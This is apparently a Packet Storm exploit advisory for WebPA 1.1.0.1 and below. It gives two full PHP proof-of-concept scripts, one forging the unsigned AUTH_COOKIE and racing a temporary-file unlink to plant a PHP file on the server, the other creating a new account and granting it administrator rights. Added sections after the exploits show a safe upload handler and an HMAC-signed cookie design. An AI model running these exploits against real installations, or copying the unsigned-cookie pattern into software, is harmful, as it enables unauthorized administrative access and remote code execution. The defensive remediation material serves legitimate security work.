
WebPA 1.1.0.1 File Upload / Add Administrator

Posted Aug 24, 2012
Authored by dun

WebPA versions 1.1.0.1 and below suffer from an add-administrator vulnerability and an arbitrary file upload vulnerability; both are reached by forging the application's unsigned authentication cookie.

tags | exploit, arbitrary, vulnerability, bypass, file upload
MD5 | 3c213bf9e0a7f33fc0e2999108c7fdc6

:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-23 ]
##################################################
# [ WebPA <= 1.1.0.1 ] Multiple Vulnerabilities #
##################################################
#
# Script: "WebPA is an open source online peer assessment tool that enables
# every team member to recognise individual contributions to group work."
#
# Vendor: http://www.webpaproject.com/
# Download: http://sourceforge.net/projects/webpa/files/webpa/
# Exploits were tested on:
# Windows (Apache 2.2.17 + php 5.2.17)
# Linux Centos (Apache 2.2.3 (CentOS) + php 5.2.17)
#
##################################################
# [ Arbitrary File Upload ]
# PoC exploit Code:
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// open a raw socket to the target and write one complete HTTP request
function http_send($host, $port, $headers) {
    $fp = fsockopen($host, $port);
    if (!$fp) die('Connection -> fail');
    fputs($fp, $headers);
    return $fp;
}

// read the full response (status line included) and close the socket
function http_recv($fp) {
    $ret = "";
    while (!feof($fp))
        $ret .= fgets($fp, 1024);
    fclose($fp);
    return $ret;
}

print "\n# WebPA v1.1.0.1 Arbitrary File Upload #\n";
print "# Discovered by dun \ posdub[at]gmail.com #\n\n";
if ($argc < 3) {
    print "Usage: php $argv[0] <host> <path>\n";
    print "Example: php $argv[0] localhost /WebPA/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];
$tmp = 'tmp/';            // web-reachable directory readfile.php stores the upload in
$temp_prefix = 'temp_';   // prefix readfile.php puts in front of the client-supplied filename
$up_file = 'phpinfo.php';
$i = 0;
// preparing cookie for authentication bypass: AUTH_COOKIE is just
// base64(expiry|time|serialize(user array)) with no signature, so the server
// accepts whatever user_id and admin flag the client puts in it
$cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array('user_id'=> '1', 'admin'=> '1')));
// preparing POST data to perform the maximum delay before deleting temporary php file:
// readfile.php saves the upload as tmp/temp_<filename>, parses it, then unlinks it;
// a GET to tmp/temp_phpinfo.php inside that window runs the PHP below, which
// writes a permanent tmp/phpinfo.php
$payload = "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"%s\"\r\n";
$payload .= "Content-Type: text/plain\r\n\r\n";
$payload .= "<?php fwrite(fopen('%s','w'),'<?php phpinfo(); ?>'); ?>!".str_repeat("A",40)."\r\n";
// making max lag, before unlink: thousands of short "!"-separated records keep the parser busy
$payload .= str_repeat(str_repeat("A!",1)."!".str_repeat("A!",4)."\r\n",1000)."\r\n";
$payload .= "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"rdoFileContentType\"\r\n\r\n";
$payload .= "2\r\n";
$payload .= "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"rdoFileSeperator\"\r\n\r\n";
$payload .= "!\r\n";
$payload .= "-----------------------------187161971819895--\r\n";
// first %s: name the server stores the upload under, second %s: file the dropper writes
$body = sprintf($payload, $temp_prefix.$up_file, $up_file);
$headers = "POST {$path}{$tmp}readfile.php HTTP/1.1\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\r\n";
$headers .= "Content-Length: ".strlen($body)."\r\n\r\n";   // length of the body as sent, not of the template
$headers .= $body;
// send the upload and drop the connection without waiting; the server keeps parsing
fclose(http_send($host, 80, $headers));
$headers = "GET {$path}{$tmp}%s HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n\r\n";

// race the unlink: poll the temporary file until it answers with something other than 404
while(++$i<1000) {
    $res = http_recv(http_send($host, 80, sprintf($headers, $temp_prefix.$up_file)));
    if(!preg_match('/404 Not Found/',$res)) {
        // the temporary file executed; confirm the permanent file it wrote is served
        $res = http_recv(http_send($host, 80, sprintf($headers, $up_file)));
        if(preg_match('/200 OK/',$res))
            print "Success!\n\nUploaded file: http://{$host}{$path}{$tmp}{$up_file}\n";
        break;
    }
}
if($i==1000) print "Failed.\n";
?>
#
##################################################
# [ Arbitrary Add Admin ]
# PoC exploit Code:
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// open a raw socket to the target and write one complete HTTP request
function http_send($host, $port, $headers) {
    $fp = fsockopen($host, $port);
    if (!$fp) die('Connection -> fail');
    fputs($fp, $headers);
    return $fp;
}

// read the full response (status line included) and close the socket
function http_recv($fp) {
    $ret = "";
    while (!feof($fp))
        $ret .= fgets($fp, 1024);
    fclose($fp);
    return $ret;
}

print "\n# WebPA v1.1.0.1 Arbitrary Add Admin Exploit #\n";
print "# Discovered by dun \ posdub[at]gmail.com #\n\n";
if ($argc < 5) {
    print "Usage: php $argv[0] <host> <path> username password\n";
    print "Example: php $argv[0] localhost /WebPA/ foo bar\n";
    die();
}

$host = $argv[1];
$path = $argv[2];
$newuser = $argv[3];
$newpass = $argv[4];
// same unsigned AUTH_COOKIE forgery as the upload exploit: user_id 1 with the admin flag set
$cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array( 'user_id'=> '1', 'admin'=> '1' )));
print "Adding a new user [ {$newuser} : {$newpass} ]\n";
// step 1: the admin bulk-load page accepts a CSV of users; a single row creates the account
$payload = "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"user.csv\"\r\n";
$payload .= "Content-Type: text/csv\r\n\r\n";
$payload .= "institutional_reference,forename,lastname,email,username,module_code,department_id,course_id,password\r\n";
$payload .= "1,2,3,4,{$newuser},6,7,8,{$newpass}\r\n\r\n";
$payload .= "-----------------------------187161971819895\r\n";
$payload .= "Content-Disposition: form-data; name=\"rdoFileContentType\"\r\n\r\n";
$payload .= "2\r\n";
$payload .= "-----------------------------187161971819895--\r\n";
$headers = "POST {$path}admin/load/simple.php HTTP/1.1\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\r\n";
$headers .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
sleep(2);
print "Granting admin privileges for user [ {$newuser} ]\n";
// step 2: scrape the staff listing for user ids (php?u=<id>); the highest id is taken
// to be the account just created
$headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n";
preg_match_all('/php\?u=(\d+)/', http_recv(http_send($host, 80, $headers)), $matches);
if(empty($matches[1]) || !is_numeric(max($matches[1]))) die('Failed.');
sleep(2);
// step 3: the edit page trusts the forged cookie, so chk_admin=on promotes the new account
$payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=".urlencode('Save Changes');
$headers = "POST {$path}admin/edit/index.php?u=".max($matches[1])." HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
print "Success!\n\n";
print "http://{$host}{$path}login.php\n";
print "user: {$newuser}\n";
print "pass: {$newpass}\n";
?>
#
### [ dun / 2012 ] ###############################
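The upload exploit works because, as its comments and request show, tmp/readfile.php stores the upload under the web root as tmp/temp_<client filename>, parses it, and only then unlinks it; a large body keeps the PHP file reachable long enough to be requested. The block below is an added example, not WebPA's code, of a CSV upload handler that leaves no such window: it never uses the client filename, stores the file under a random server-chosen name outside the document root, whitelists the extension and the field separator, and deletes the file in a finally block. The directory /var/lib/webpa/uploads, the function names and the 2 MB limit are assumptions.

```php
<?php
// Added example (not WebPA code): accept a CSV upload without giving the
// client any control over where it lands or what it is called.
// Assumptions: $uploadDir lies outside the document root and is writable by
// the web server user; the form field is $_FILES['uploadedfile'].
declare(strict_types=1);

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;          // assumed limit
const ALLOWED_SEPARATORS = [',', ';', "\t"];       // never an arbitrary client-chosen byte

/**
 * Move an uploaded file to $uploadDir under a random name with a fixed
 * extension and return the new path. The client filename is only consulted
 * to decide whether to accept the upload; it never reaches the filesystem.
 */
function store_csv_upload(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a PHP-managed upload');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file too large');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['csv', 'txt'], true)) {
        throw new RuntimeException('unsupported file type');
    }
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.csv';
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    return $dest;
}

/**
 * Parse the stored CSV and remove it, even when parsing throws. Because the
 * file sits outside the web root, no URL maps to it at any point, however
 * long the parse takes.
 */
function process_csv_upload(string $path, string $separator): array
{
    if (!in_array($separator, ALLOWED_SEPARATORS, true)) {
        unlink($path);
        throw new InvalidArgumentException('unsupported separator');
    }
    $rows = [];
    try {
        $fh = fopen($path, 'r');
        if ($fh === false) {
            throw new RuntimeException('cannot open stored upload');
        }
        while (($fields = fgetcsv($fh, 0, $separator)) !== false) {
            $rows[] = $fields;
        }
        fclose($fh);
    } finally {
        unlink($path);
    }
    return $rows;
}

// Usage (hypothetical directory):
// $path = store_csv_upload($_FILES['uploadedfile'], '/var/lib/webpa/uploads');
// $rows = process_csv_upload($path, $_POST['rdoFileSeperator'] ?? ',');
```

Where an application must keep uploads under the web root for other reasons, the second line of defence is to stop the interpreter from running anything there, for example `php_admin_flag engine off` inside an Apache `<Directory>` block for that path; the race above is harmless if the temporary file is served as text.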
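Both exploits get past authentication with the same forged AUTH_COOKIE: base64 of two timestamps and a serialize()d array carrying user_id and admin, with nothing in it the server can check. The block below is an added example, not WebPA's code, of an authentication cookie signed with a server-side key (HMAC-SHA256) that carries an expiry, encodes its claims as JSON rather than PHP serialization, and leaves the admin decision to a server-side lookup. The key value, the function names and the one-hour lifetime are assumptions; the demonstration at the bottom feeds the verifier the cookie the exploits construct and a tampered genuine cookie, and reports both as rejected.

```php
<?php
// Added example (not WebPA code): an authentication cookie the client cannot
// forge. Assumptions: $secret is at least 32 random bytes that never leave the
// server; times are Unix seconds; the cookie carries identity only and the
// admin flag is looked up in the database on every request.
declare(strict_types=1);

function issue_auth_cookie(int $userId, string $secret, int $ttl = 3600): string
{
    $claims = [
        'user_id' => $userId,
        'exp'     => time() + $ttl,
        'nonce'   => bin2hex(random_bytes(8)),
    ];
    // JSON, not serialize(): nothing gets instantiated when it comes back in.
    $body = base64_encode(json_encode($claims, JSON_THROW_ON_ERROR));
    return $body . '.' . hash_hmac('sha256', $body, $secret);
}

/** Return the claims if the MAC and expiry check out, otherwise null. */
function verify_auth_cookie(string $cookie, string $secret): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;                       // no MAC at all (the "a|b|serialized" shape)
    }
    [$body, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, $secret), $mac)) {
        return null;                       // forged or tampered
    }
    $raw = base64_decode($body, true);
    if ($raw === false) {
        return null;
    }
    $claims = json_decode($raw, true);
    if (!is_array($claims) || !isset($claims['user_id'], $claims['exp'])) {
        return null;
    }
    if (!is_int($claims['exp']) || $claims['exp'] < time()) {
        return null;                       // expired
    }
    return $claims;
}

// Demonstration with a hypothetical key (in practice: random_bytes(32) kept in config).
$secret = str_repeat("\x42", 32);

$good = issue_auth_cookie(1, $secret);
$claims = verify_auth_cookie($good, $secret);
echo ($claims !== null && $claims['user_id'] === 1) ? "genuine cookie accepted\n" : "BUG\n";

// The cookie the exploits build: no MAC, so it is rejected before anything is decoded.
$forged = base64_encode((time() * 2) . '|' . (time() * 2) . '|' . serialize(['user_id' => '1', 'admin' => '1']));
echo verify_auth_cookie($forged, $secret) === null ? "forged cookie rejected\n" : "BUG\n";

// Editing a claim inside a genuine cookie invalidates the MAC.
[$body, $mac] = explode('.', $good, 2);
$tampered = base64_encode(str_replace('"user_id":1', '"user_id":2', base64_decode($body))) . '.' . $mac;
echo verify_auth_cookie($tampered, $secret) === null ? "tampered cookie rejected\n" : "BUG\n";
```

The point of keeping the admin flag out of the cookie is that a signed cookie only proves who the bearer is; whether that user may reach admin/load/simple.php or admin/edit/index.php is then decided from the current database record, so a role change takes effect without waiting for every issued cookie to expire.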


© 2019 Packet Storm. All rights reserved.
